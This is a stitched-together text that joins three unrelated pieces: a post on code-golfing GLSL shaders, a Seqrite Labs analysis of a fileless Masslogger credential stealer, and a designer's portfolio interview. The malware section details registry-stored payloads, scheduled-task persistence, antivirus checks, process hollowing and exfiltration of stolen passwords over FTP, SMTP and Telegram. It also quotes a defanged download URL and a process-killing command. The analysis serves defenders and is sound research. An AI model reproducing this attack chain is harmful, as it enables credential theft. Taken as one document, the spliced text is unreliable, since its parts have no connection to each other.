People often ask me whether I write my shaders in a compact form from the start or if I write them expanded and then
reduce the code afterward. The answer is the former. I’ve practiced code golfing so much that I find it easier to
prototype ideas in compact form, and I tend not to get lost in tiny shaders. Code golfing shaders requires finding the
right balance between code size, render performance, artistic appeal, design, and mathematical function. It’s a
delicate balance that definitely challenges both sides of my brain. I’ve learned a ton about math, art, and design
through writing these!
To start one, you need an idea. When writing the “Milky” stars shader, I knew I wanted to create some kind of galaxy, so that was my initial spark.
My shaders typically start with centering and scaling so that they look good at various resolutions and aspect ratios. For the stars, I looped through 100 point lights revolving around the center. I love glowing effects, and they are pretty easy to create. You just need to know the distance from the current pixel to the light source and use the inverse for the pixel brightness (close pixels are brighter, far pixels are darker).
I played around with the positions of the particles using some trigonometry and gave the disk a slight skew. For the coloring, I love to use some sine waves with a phase shift for the RGB channels. Sine waves are also useful for picking pseudo-random numbers, so that’s how I select the colors for each star. Using the sine formula, you can get palettes like these:
I ended up with a slight alteration of the one second from the left. It has a nice range of temperatures and brightness. I also added some variation to the star brightness, which made the image much more interesting to look at.
Next, I applied some tonemapping with the hyperbolic tangent function for size. Tonemapping prevents the harsh overexposure and hue shifts that happen when a color channel hits its maximum brightness value (left is original, right is with tonemapping):
Any good shader that has High Dynamic Range lighting should apply some tonemapping, and tweet shaders are no
exception! Finally, I played with animation. It could have revolved or twisted, but in the end, I liked the
contraction effect most. I also created a loop so that new stars faded in when the old stars reached the center. You
can read about my design process in more detail here
!
Code Golfing
As you can imagine, there are hundreds of little techniques that I have developed (and continue to discover) in the
process of shrinking the code down, but I can give you the abridged version! My generalized code-golfing process can
be listed like so:
Reduce names:
It may be challenging initially, but you can get used to single-letter variables and function names. You may
sometimes forget what variables are for, but this is actually helpful for code golfing. It forces you to reread your
code, and you’ll often find better ways to write it when doing so. Like anything else, your memory will improve with
practice, and over time you will establish some standards (for me: p = position, c = color, O = frag output, I =
input, etc.).
Reduce numbers:
This is pretty self-explanatory. 1.0 == 1.
, 1000.0 == 1e3
. Don’t forget that with vector constructors, you can use any data type as an input, and it gets converted (“cast”)
to the new type: vec4(1.0, 1.0, 1.0, 1.0) == vec4(1)
. If you’re multiplying by 10.0
, you could instead divide by .1
.
Minimize initializations:
If you have two floats, “x” and “y”, try to initialize them together like so: float x = 0., y = 1.;
Look for opportunities to share data types. If you have a color vec3 and a vec4, make them both vec4s. Avoid
float/int conversions.
Avoid ifs:
If statements in GLSL take up a bit of space, especially if you need an else if
. Try using a ternary instead. For example: if (x>y) O = vec4(1,0,0,1); else O = vec4(0,1,0,1);
becomes O = x>y ? vec4(1,0,0,1) : vec4(0,1,0,1);
. Much shorter, and there’s a lot you can do with it. You can even set multiple variables between ?
and :
.
for(;;) > while(): for
and while
use the same number of characters, but for
has a spot for initializing (before the first semicolon) and a spot for the final step after each iteration (after
the last semicolon). These are free slots that can be used for lines that would otherwise have to end with a
semicolon. Also, avoid using break
, and use the condition spot instead! You can also remove the brackets if each line ends with a comma (so it doesn’t
work with nested for
-loops).
Beyond that, I use some function substitutions to reduce the code further. More on that over here
!
I’ve put together a ShaderToy demo
with some additional variables, formatting, and comments for clarity. Every shader is different and requires using
different techniques, approximations, and concepts, but that is precisely what makes it so fun for me! I’m still
learning new stuff nearly every day!
Questions and Answers
Here are some questions I was asked on X.
Do you have a favorite “trick” or “technique”? If so, what is it?
How did you develop the intuition for related maths?
It takes lots of time and patience. I had to push through many times when I thought a topic was over my head. If you
take it in small pieces, take breaks, and sleep on it, you can learn a lot! I wrote about some of the conceptualization techniques
that I’ve picked up over the years. That might save you some time!
Do you start writing the shader in code-golfing mode, or is it a process until you reach the most optimized code? Which is the best editor for normal shaders and for code-golfing shaders?
Yes, I write in code-golfing mode because I’ve developed an intuition for it, and it feels faster to prototype at this
point. I still have to refine the code when I find a look that I like, though. I’m a big fan of Twigl.app, but
ShaderToy is great too. ShaderToy is best for its community and wealth of knowledge. I try to use it when explaining
my tweet shaders.
How did you start writing cool shaders, and what did you use to learn it?
Well, I’ll explain more about my background later, but it started with an interest in game development. Shaders have
tons of applications in video game graphics—that’s what sparked my curiosity to learn.
Do you have regrets related to sacrificing readability?
Nope. I’m more concerned with size optimizations that lead to slower code, but I don’t mind the unreadable code. To
me, that’s part of the magic of it.
What’s your background that got you to the point where you could effectively learn the material?
It’s story time…
My Story
Growing up, I was interested in video games, especially those with “fancy” 3D graphics. When I was around 10, my friend showed me a tool called GameMaker. I tinkered around with it and learned some of the basics of drag ‘n’ drop programming, variables, and conditionals.
Over time, I started experimenting with 3D graphics in GM, even though it was (and still is) primarily a 2D game engine. It was enough to learn the basics of how 3D rendering works and the render pipeline. Later, GameMaker introduced this thing called “shaders,” which allowed developers to create more advanced effects. At the time, there weren’t many resources available, so it took a while for me to pick it up. I started posting my shaders on the GameMaker forums and got some helpful feedback from the community (shoutout to “xygthop3” for his helpful examples)!
Game development was a great place to learn about shaders because you have performance constraints (you don’t want a game to stutter), and you learn a lot about the entire rendering process in that context. In 2014, I started posting my earliest shader tutorials, sharing techniques as I learned them. The early tutorials weren’t great, but I’m glad I wrote them. In 2015, I started exploring ShaderToy, and that’s where my skills really developed.
There were so many great examples to learn from, and it was a good place to get feedback on my ideas. In 2021, I launched a new introductory tutorial series for GameMaker with GLSL 1.00. Now I post more generalized tutorials on all kinds of graphics topics, ranging from math to art to design to code and more. This is definitely my best series yet, and they continue to get better. If you are interested in video games and graphics, I highly recommend starting with GameMaker or Godot. They are relatively easy to learn while still powerful enough to teach you the ropes. If software or web dev is more your thing, you can’t go wrong with ShaderToy or compute.toys.
Here are some of the great people who have helped me, directly or indirectly, along the way:
xygthop3 – This guy’s free shader examples were probably the greatest help along the way. His examples were a pivotal point in my understanding of a variety of graphics techniques, so thanks, Michael!
Inigo Quilez – Inigo is the author of ShaderToy and the king of raymarching. His Signed Distance Field functions are still foundational to this day. An absolute legend!
Fabrice Neyret – Fabrice is probably the best shader code golfer there is, and many shaders are inspired by his work. He has taught me so many techniques over the years.
Yonatan “zozuar” – Another major inspiration for me. Yonatan’s work convinced me to try code golfing for real on Twitter, and his brain is amazing.
I’m sure there are many others whose names are eluding me at the moment, but I want to thank the entire shader
community for their feedback and encouragement.
Arsenal
I’ll wrap this up with a few of my favorite tweet shaders so far:
During our recent investigation at Seqrite Labs, we identified a sophisticated variant of Masslogger credential stealer malware spreading through .VBE (VBScript Encoded) files. Initially, the variant appeared to be a typical script-based threat, but upon deeper analysis it turned out to be a multi-stage fileless malware that heavily relies on Windows Registry to store and execute its malicious payload.
In this blog post, we analyzed the internal flow of VBScript code, the obfuscation mechanism used, and how it manipulates system to remain fileless. Also, we have explained about the Stagers and the capabilities of the final Masslogger payload.
Initial Infection Vector:
The infection begins with .VBE file, likely distributed via spam email or drive-by downloads. .VBE file is a VBScript encoded with Microsoft’s built-in encoding scheme to detect casual inspection. Once decoded, the script reveals multiple layers of obfuscation, modular routines and true functionality.
Analysis of Decoded .VBS – [VBScript] File:
Initially, .VBS file prepares and writes multiple registry values under a specific key used by the malware. It sets up the execution environment for storing a fileless payload.
Registry Key and Value names are hard-coded and straightforward. However, few of the critical value data are kept encoded and are decoded during file execution.
-Registry Setup for Commands and Stager Configuration:
Subroutine AKAAU() is used to prepare keys and values before they are written to the registry. Value names and Value Data are stored as a separate array – “QORXG” and “ZBZLV” respectively. Both arrays are written to registry by using “RegWrite”.
Fig-1 : .VBS file prepares and writes multiple Windows Registries
Once system is infected, we can find these malicious registry entries in Registry Editor:
Fig-2: Malicious Registry entries, values and their probable Meaning
Here is the summary of Registry Entries written to the system at registry path “HKCU\Software\”:
Value Name
Value Data
Summary
cn
Stop-Process -Name conhost -Force
Forcefully kill conhost.exe process.
i
“AddInProcess32.exe”
Target process for code injection.
in
“0”
Control flag, checking if PowerShell command already run or not.
instant
LPICU
Obfuscated PowerShell commands. Deobfuscate and loads Stager-1 in memory.
Path
esBbIgyFlZcXjUl
Name of the registry key path. It is appended to “HKCU\Software\”.
r
WAJLA
.Net assembly, stored in reversed string format. Stager-2.
Obfuscated Commands for PowerShell. Deobfuscate and loads Stager-1 in memory. Specifically used as user input simulation.
Table-1: Summary of added registry entries
Before writing these registries, malware calls a subroutine “ZGYHW()” that checks if the file “C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe” is present at location.
Depending upon the presence, malware deploys different versions of Stagers. Specifically, Stager-2 in this scenario:
Fig-3: Check for MSBuild.exe file presence
– Registry Setup for Final Payload Deployment:
After above registries are configured and written, there is a call to another subroutine “XSSAY()”. This function is responsible for reading another larger string data (which is an actual Masslogger payload, kept encoded). This data is then split into 25,000-character chunks and writes them in another registry values in segmented form.
Fig-4: Malware splitting another large string data to chunks and writing it to registries
Each chunk is written to the registry at these paths:
Fig-5: New registries added as a chunks of string data
-Task scheduler:
Malware establishes persistence via a Windows scheduled task, ensuring that malware keeps running in the system. Trigger for the task starts on the date of infection (20xx-xx–xxT00:00:00) and repeats every 1 minute (PT1M). Task is scheduled to run ignoring the battery-related restrictions.
Fig-6: Task Scheduling
Task uses the same name as a created registry key i.e. esBbIgyFlZcXjUl and is triggered to run a .VBS file. This .VBS acts as a persistent execution loop that checks for a created registries indicating whether a payload should be executed.
-Task Scheduler Script – Capable of Simulating User Input:
As we can see in the image below:
It runs for around 10000 times, sleeping for 10 seconds between each cycle.
It reads registry value “i” to get the name of process and confirm if it is running or not.
Then it checks for registry value “in” set to 1,
if yes, it silently executes malicious command stored in registry “instant”.
When value in “in” is not set to 1.
It launches PowerShell in visible window mode and uses “.SendKeys” methods to input values of “v” and “cn” registries followed by “{ENTER}”.
This technique is like simulating user inputs to PowerShell.
Fig-7: esBbIgyFlZcXjUl.VBS file with user input simulation
As we saw in summary table,
“cn” registry is used to forcefully stop the running instance of conhost.exe process.
“instant” and “v” registries are used as a PowerShell to de-obfuscate, prepare and load Stager .Net assembly in memory, without touching the disk.
Check for System Protection Status:
Malware checks the protection status of the target system and possibly remain undetected during execution. It does so by querying some important registries. Below are a few of the registries where AV / Security products usually register their presence:
These registries are defined in the script in encoded format. Malware tries to enumerate through the subkeys of above keys and attempts to read “DisplayName” value. DisplayName holds the name of the installed AV / Security tool. If multiple security products are found to be installed on target system, malware halts its execution.
Fig-8: Check the presence of installed security tools
-Trigger for Stager:
The subroutine SQSKP() in .VBE file is a critical part of malware execution chain. It dynamically constructs and runs a PowerShell command that performs in-memory execution of a .NET stager retrieved from the Windows Registry.
Fig-9: Trigger for stager
Here, the decoded text is a de-obfuscated PowerShell commands, after replacing |path| with RVOYN.
Fig-10: Deobfuscated PowerShell command
As we can see in Fig-10 –
This PowerShell command is formed and assigned to variable “LPICU”.
The contents of variable are then written to registry value “\instant”, which is created inside registry key “Computer\HKEY_CURRENT_USER\SOFTWARE\esBbIgyFlZcXjUl”.
Function runs the constructed PowerShell command silently, where “0” – hides PowerShell window.
The PowerShell then reads registry key “HKCU\Software\esBbIgyFlZcXjUl\s” – This registry key contains the Stager-1, kept in revered Base64- encoded format.
Fig-11: Forming stager-1 by reversing and Base64 decoding
We have seen malware authors implementing this encoding combo in many of the recent credential stealers, including VIPKeylogger, Remcos, AsyncRAT etc.
The PowerShell command reverse the string, joining them, decodes base64 strings and load it as a .Net assembly using “[AppDomain]::CurrentDomain.Load ()” function in memory. This approach allows malware to:
Avoid writing actual malware files to disk (Evasive capability).
Dynamically construct and load payload at runtime.
Invokes entry method “[v.v]::v(‘esBbIgyFlZcXjUl’)”, that refers to the registry path.
We took the dump of deobfuscated stager-1 payload for further analysis. Our observations are as follows:
Analysis of Stager-1:
Stager-1 is a small executable kept encoded at registry “HKCU\Software\esBbIgyFlZcXjUl\s”. It is compiled in .Net and size is around ~14KB.
Analyzing its code, we found that the file is trying to read contents from another registry key with name “r” – [HKCU\Software\esBbIgyFlZcXjUl\r].
Those contents are reversed and another .Net compiled binary is formed – the stager-2.
This binary is then loaded in memory using “Assembly.Load()”. Stager-1 tries to locate method r() inside the class r inside the Stager-2 assembly. It is the entry point for the execution of stager-2.
Fig-12: Stager-1 trying to load Stager-2 and locate Method “r” in it
Analysis of Stager-2:
After Stager-1 completes its setup, malware proceeds to its Stager-2 loader. This stage of infection is focused on extracting actual Masslogger payload from registry and injecting it into target process.
Stager-2 initially constructs potential file paths to launch process and performing code injection.
It checks if a file (whose name is retrieved from the registry value “i”) exists in any of these paths.
In our case, we found the target file/process path is:
Fig-13: Constructing file/process path for code injection.
Further, malware extracts actual Masslogger payload which was previously written (by subroutine “XSSAY()”) in multiple registry subkeys under below registries, that we saw earlier “.
The BBX() function of class ‘r’ is responsible for collecting all value entries, concatenate them, reverses the combined string, and then decodes it from hexadecimal into raw bytes. This technique allows malware authors to hide a full PE binary across multiple registry keys. The decoded payload is then used for process hollowing. Process hollowing is performed using function .XGP()
It’s a clever way to keep everything stored in the registry and only use memory for execution.
Fig-14:Function performing payload deobfuscation and process hollowing
-France Specific Payload Delivery:
Geo-targeted payload delivery is now common in advanced malware to alter behavior based on the victim’s location. Stager-2 of this infection checks if current system’s input language is set to French “Fr” and whether locale contains “France”.
Fig-15: France specific payload delivery
If conditions are met, it tries to download specially crafted additional payload from hardcoded URL – hxxps://144.91.92.251/MoDi.txt. At the time of analysis, the URL was not accessible.
-Terminating Traces and Exiting:
At the end of its execution, the malware forcibly terminates running instances of conhost.exe and PowerShell.exe processes.
Fig-16: Process killing to hide traces
By killing these processes, malware likely aims to hide its activity traces. Finally, it exits application using ProjectData.EndApp(), completing stager-2 lifecycle.
Analysis of Masslogger Final Payload:
After successful deobfuscation of final payload from registry, Masslogger is injected to into target process – “AddInProcess32.exe”. We can see the marker of this malware in memory dump of the injected process as below:
Fig-17: Marker of Masslogger in memory
We took a memory dump of this payload representing the final stage in malware chain. It is responsible for executing the main credential – info stealing functionalities.
-Data Harvesting:
Just like many infostealer malware’s, this malware is also targeting multiple Web browsers and few email clients for stealing sensitive information, like saved Username, Passwords, autofill data, etc. Below are list of Web Browsers and few email clients Masslogger is trying to target.
Fig-18: Targeted browsers and email client for credential Harvesting
Let’s see one of the modules in detail where malware is trying to harvest saved login credentials from the Chrome browser.
Fig-19: Chrome browser specific module for credential harvesting
It locates the user’s login data by accessing its “Login Data” SQLite database. It extracts website URLs along with corresponding usernames and passwords and collects them for further use. If valid credentials are found, they are stored in a structured format like the website, username, and password.
Apart from targeting browsers and email clients for info stealing, Masslogger also possesses capabilities of:
Keylogger activity.
Take and clear snapshot files.
Retrieve clipboard data.
Try monitoring user activity by calling GetForegroundWindow, GetWindowText etc.
Read system details, like IP address and Country.
Uploading multiple files to server.
-Data Exfilteration:
The SpeedOffPWExport() method in final payload enables data exfiltration by sending collected credentials and system information to remote locations via multiple channels, like FTP, SMTP or Telegram.
If FTP is enabled, the method uploads the stolen data as a .txt file to a remote FTP server using hard-coded credentials.
Fig-20: Data exfilteration via FTP
For SMTP, it constructs an email containing the data in either the message body or as an attached text file and sends it using the specified mail server.
Fig-21: Data exfilteration via SMTP
If Telegram exfiltration is enabled, it sends the data as a document using the Telegram Bot API, including a caption with the victim’s username and IP.
Fig-22: Data exfilteration via Telegram
Conclusion:
The Masslogger fileless variant shows the evolving trend of info-stealing malware. Delivered via a .VBE script, it abuses Windows Registry to store actual executable payload and loads that payload directly in memory without touching the disk. It possesses capability to harvest stored credentials from multiple browsers and email clients and using multiple channels [FTP, SMTP, Telegram Bot] for data exfiltration.
This variant shows the shift of credential stealer malware towards fileless and operation in multiple stages (Stager-1, Stager-2). This challenges traditional AV and signature-based detection methods. To overcome this, security defenders must employ advanced detection mechanisms like behavioral detection, monitor registry anomalies etc.
I’m Bimo Tri, a multidisciplinary designer and creative developer based in Indonesia. I run a small independent studio called Studio•Bämo.J®, working between Jakarta and Bali — or pretty much anywhere I can find a fast internet connection.
My focus is on building expressive digital experiences, mostly portfolio sites and brand platforms for creatives, studios, and design-forward brands. With roots in both design and development, I enjoy blending visual precision with motion and interactivity to create work that feels both thoughtful and visceral. I care deeply about craft, story, and making things that resonate beyond just visuals.
Saisei is a visionary architecture firm based in Tokyo, Japan, focused on sustainability, culture, and timeless design. I designed and developed the site to reflect their philosophy merging traditional Japanese aesthetics with clean, contemporary digital design.
Achievements
This project was a major milestone in my career. It brought home my first Awwwards Site of the Day and earned recognition from several other platforms. The positive feedback from the design community affirmed my approach to cultural storytelling through digital mediums.
Personal notes
Saisei remains one of my favorite works. I’ve always been drawn to the tension between heritage and modernity, and this project gave me the space to explore that deeply. The recognition it received made the process even more meaningful.
Nagara is a concept project developed in collaboration with my buddy Felixander Yuan, created as part of the #DareToShare24 design challenge by @bentenwordring.
It reimagines a luxury watch brand that fuses the precision of Swiss watchmaking with the cultural depth of the Majapahit Empire. Each timepiece acts as a tribute not just to technical craftsmanship, but to historical richness and aesthetic symbolism rooted in Indonesian heritage.
Challenges
One of the biggest hurdles was exploring AI-generated imagery and motion assets. Using tools like Midjourney and Kling, it took numerous iterations to dial in a visual direction that felt both on-brand and high-end. Getting the product visuals — especially the watches — to look authentic and aligned with the brand’s narrative was far more challenging than anticipated.
Achievements
The final result was a fully animated concept site that we were genuinely proud of. Yuan did an amazing job bringing the dev and motion to life. Beyond that, the project ended up winning the monthly challenge, earning recognition and some cool prizes — a nice bonus on top of the creative satisfaction.
Personal notes
This one felt personal. The month’s theme was “Luxury” — a space I naturally gravitate toward — and we were allowed to team up for the final challenge. I chose to work with Yuan, someone I’ve respected and known for a while. The entire process felt like a return to roots — storytelling, culture, and collaboration — wrapped inside a luxury narrative.
Horizon Studio is a conceptual architecture firm based in Los Angeles, created to explore the intersection of art, design, and technology. Inspired by my love for architecture and interior design, the site showcases sleek, avant-garde visuals with a focus on sustainability. I used Midjourney for the visual assets and GPT to shape the narrative, crafting an experience that feels modern and immersive.
Achievements
The site received an Honorable Mention from Awwwards — a validating moment for me as it was one of my earliest forays into the architecture space. The feedback highlighted the strength of the design direction and the site’s overall atmosphere.
Personal notes
This was the first project where I went all in with generative AI — every asset was made using prompts, and honestly, it was pretty sloppy at first. But through experimentation, I managed to create a cohesive visual style that looked like it came from one photographer. It reminded me how fun it is to dive into the unknown and just explore.
REZN-8 is a typographic and layout exploration rooted in Swiss design principles. It started as a poster experiment and evolved into a full website — my first time building a motion-heavy site entirely with code. It was all about translating static design into something dynamic, expressive, and functional in a digital format.
Challenges
Turning the poster into a functional site was already a challenge, but learning JavaScript on the fly to bring motion into the experience pushed me even further.
The biggest challenge, though, was researching and presenting accurate information about the legendary designers featured. Some had very little online presence, so I had to dive deep into design history to get the details right.
Personal notes
REZN-8 holds a special place in my heart. It completely changed how I see layout, grids, and type — it was the project that shifted my design brain forever. Shoutout to Chris Do and TheFutur’s Typography 01 course, which sparked the whole thing.
I didn’t start out as a designer, at least not in the traditional sense. My early work was in a marketing agency where I handled everything from FB ad graphics to SEO landing pages and WordPress articles. It wasn’t glamorous, but it gave me a foundation in how digital systems work.
Then I stumbled across Webflow — and everything changed. I got completely hooked on web design, especially sites with rich motion and interaction.
That moment pushed me to quit the agency world and start my own studio. Since then, I’ve been building expressive, story-driven websites for creatives and design-forward brands, blending design, motion, and development into something that feels personal and intentional.
Design Philosophy
I’ve always leaned toward minimal design paired with bold, heavy type. To me, you don’t need a lot to make something striking, just the right balance of restraint and intention. If the typography is solid and the layout is thoughtful, even the simplest design can carry emotional weight. I focus on clarity, rhythm, and a strong visual pulse — letting motion, space, and type do the heavy lifting.
Tools and Techniques
Figma for most of the design work
Webflow for front-end development and CMS integration
GSAP for all things motion and interaction
Cursor for dev support (because I wouldn’t call myself a “real dev,” but I make it work)
Inspiration
I pull inspiration from a lot of places — music, films, anime — especially the ones that are crafted with insane attention to detail. I’ve always admired how much intention goes into those worlds. There’s so much to steal from them — not just visually, but conceptually and emotionally. I’m also inspired by work that feels personal, raw, and beautifully uncompromising.
Future Goals
My main goal is to keep attracting work that aligns with the way I see and do things. I’m not chasing volume — I just want to keep collaborating with people who value design, story, and craft as much as I do. I’m also interested in exploring more personal projects, maybe even merging design with philosophy, fitness, or writing — things that feel more like extensions of who I am, not just what I do.
Final Thoughts
Learn from the past, embrace the present moment, and look into the future. You only live once, do what makes you happy and what feels right for you.
Contact Info
I’m mostly active on LinkedIn, X (Twitter), and occasionally Instagram.